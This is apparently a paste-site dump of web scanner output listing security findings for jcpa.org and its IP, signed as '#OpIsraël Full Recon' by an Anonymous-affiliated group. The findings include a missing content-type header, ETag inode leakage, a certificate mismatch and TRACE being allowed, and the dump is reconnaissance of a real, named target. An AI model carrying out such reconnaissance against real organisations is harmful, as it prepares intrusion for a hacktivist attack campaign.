- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'link' found, with contents: <https://jcpa.org/wp-json/>; rel="https://api.w.org/"
- + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x76 0x52405987823c0
- + "robots.txt" contains 4 entries which should be manually viewed.
- + Hostname '198.57.177.19' does not match certificate's names: jcpa.org
- + Uncommon header 'x-redirect-agent' found, with contents: redirection
- + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- Anonymous JTSEC #OpIsraël Full Recon #9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement